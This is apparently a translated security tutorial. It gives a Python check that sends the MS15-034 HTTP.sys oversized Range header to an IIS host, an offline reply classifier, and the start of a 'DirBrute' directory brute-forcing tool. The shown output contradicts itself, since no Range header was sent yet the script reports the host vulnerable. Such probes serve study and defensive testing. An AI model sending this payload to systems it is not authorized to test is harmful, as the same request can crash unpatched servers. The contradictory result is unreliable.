MS15-034 test method, reference page:
https://blog.csdn.net/Jiajiajiang_/article/details/80742955
Microsoft Windows - 'HTTP.sys' (PoC) (MS15-034), reference site:
https://www.exploit-db.com/exploits/36773
1. Vulnerability detection tool
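import requests

# Vulnerability detection tool
url = 'http://192.168.1.3/'
r = requests.get(url)
# The Server header may be absent, so fall back to an empty string
remote_request = r.headers.get('Server', '')
# str.find() returns -1 (truthy) on a miss, so test membership with "in"
if 'IIS/10.0' in remote_request or 'IIS/8.5' in remote_request:
    # The Range value has to travel as a request header, not as URL parameters
    protype = {'Host': 'stuff', 'Range': 'bytes=0-18446744073709551615'}
    r1 = requests.get(url, headers=protype)
    print(r1.request.headers)
    print(r1.content)
    # An unpatched HTTP.sys answers this range with "Requested Range Not Satisfiable"
    if b'Requested Range Not Satisfiable' in r1.content:
        print(url + ' already exits ms15-034')
    else:
        print(url + 'not exits ms15-034')
else:
    print('Server not has IIS/10.0')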
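Console output (the printed request headers contain no Range header, because this run passed the dictionary through params=, and the body is the IIS default page, so the final line does not confirm the vulnerability):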
D:\python\python.exe D:/Flask项目设计/penetration_test/apps/requests_test.py
{'User-Agent': 'python-requests/2.23.0', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Connection': 'keep-alive'}
b'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">\r\n<html xmlns="http://www.w3.org/1999/xhtml">\r\n<head>\r\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />\r\n<title>IIS Windows</title>\r\n<style type="text/css">\r\n<!--\r\nbody {\r\n\tcolor:#000000;\r\n\tbackground-color:#0072C6;\r\n\tmargin:0;\r\n}\r\n\r\n#container {\r\n\tmargin-left:auto;\r\n\tmargin-right:auto;\r\n\ttext-align:center;\r\n\t}\r\n\r\na img {\r\n\tborder:none;\r\n}\r\n\r\n-->\r\n</style>\r\n</head>\r\n<body>\r\n<div id="container">\r\n<a href="http://go.microsoft.com/fwlink/?linkid=66138&clcid=0x409"><img src="iisstart.png" alt="IIS" width="960" height="600" /></a>\r\n</div>\r\n</body>\r\n</html>'
http://192.168.1.3/ already exits ms15-034
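An added example, not part of the original post: it classifies the reply to the Range check offline, and first verifies that the Range header was actually sent. The function names, the patched-reply phrase and the sample replies are assumptions constructed for illustration.

```python
# Added example (not from the original post): offline classification of the
# reply to the Range check used in the script above.
RANGE_PROBE = 'bytes=0-18446744073709551615'      # header value from the page
VULN_MARK = b'Requested Range Not Satisfiable'    # phrase the page's script looks for
# Assumption: reply text of a patched HTTP.sys; it does not appear on the page.
PATCHED_MARK = b'The request has an invalid header name'


def classify(sent_headers, status, server, body):
    """Return 'probe-not-sent', 'not-iis', 'vulnerable', 'patched' or 'inconclusive'."""
    # Header names are case-insensitive, so normalise before looking up Range.
    sent = {name.lower(): value for name, value in sent_headers.items()}
    if sent.get('range') != RANGE_PROBE:
        return 'probe-not-sent'   # nothing was tested, so no verdict is possible
    # Membership test: str.find() returns -1 (truthy) when the text is absent.
    if 'IIS/' not in (server or ''):
        return 'not-iis'
    if status == 416 or VULN_MARK in body:
        return 'vulnerable'
    if PATCHED_MARK in body:
        return 'patched'
    return 'inconclusive'


# Constructed sample replies. The first header set mirrors the one printed in
# the page's console output, which carries no Range header.
PROBE = {'Host': 'stuff', 'Range': RANGE_PROBE}
SAMPLES = [
    ({'User-Agent': 'python-requests/2.23.0', 'Accept': '*/*'},
     200, 'Microsoft-IIS/8.5', b'<title>IIS Windows</title>'),
    (PROBE, 416, 'Microsoft-IIS/8.5', b'<h2>Requested Range Not Satisfiable</h2>'),
    (PROBE, 400, 'Microsoft-IIS/8.5', b'HTTP Error 400. The request has an invalid header name.'),
    (PROBE, 206, 'Microsoft-IIS/8.5', b'<title>IIS Windows</title>'),
    (PROBE, 200, None, b'hello'),
]


def run_samples():
    """Classify every constructed sample and return the verdicts in order."""
    return [classify(*sample) for sample in SAMPLES]


if __name__ == '__main__':
    for sample, verdict in zip(SAMPLES, run_samples()):
        print(sample[1], sample[2], '->', verdict)
```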
2. Getting command-line tool arguments
The code, edited in PyCharm, is as follows:
# Getting command-line tool arguments
import getopt
import sys


def banner():
    print('*' * 51)
    print('*' * 2 + ' ' * 17 + 'DirBrute v1.0' + ' ' * 17 + '*' * 2)
    print('This tool just develop for education!')
    print('*' * 51)


def usage():
    print("This is the tool's usage")
    print('Python DirBrute -u url -t thread -d dictionary')


usage()
banner()
# Every option takes a value, so each letter needs a trailing colon ("d:" too);
# with a bare "d", -d gets an empty value and the file name lands in args
opts, args = getopt.getopt(sys.argv[1:], "u:t:d:")
for k, v in opts:
    print(k)
    print(v)
print('*' * 50)
print(type(opts))
print(opts)
print(type(args))
print(args)
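Project folder structure
Console output (captured with the option string "u:t:d", where -d takes no value, so dir.txt shows up in args rather than as the value of -d):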
***************************************************
** DirBrute v1.0 **
This tool just develop for education!
***************************************************
This is the tool's usage
Python DirBrute -u url -t thread -d dictionary
<class 'list'>
[('-u', 'http://127.0.0.1'), ('-t', '5'), ('-d', '')]
<class 'list'>
['dir.txt']
(my_flask) D:\Flask项目设计\my_flask\ch1>python tencent_test.py -u http://127.0.0.1 -t 5 -d dir.txt
***************************************************
** DirBrute v1.0 **
This tool just develop for education!
***************************************************
This is the tool's usage
Python DirBrute -u url -t thread -d dictionary
-u
http://127.0.0.1
-t
5
-d
<class 'list'>
[('-u', 'http://127.0.0.1'), ('-t', '5'), ('-d', '')]
<class 'list'>
['dir.txt']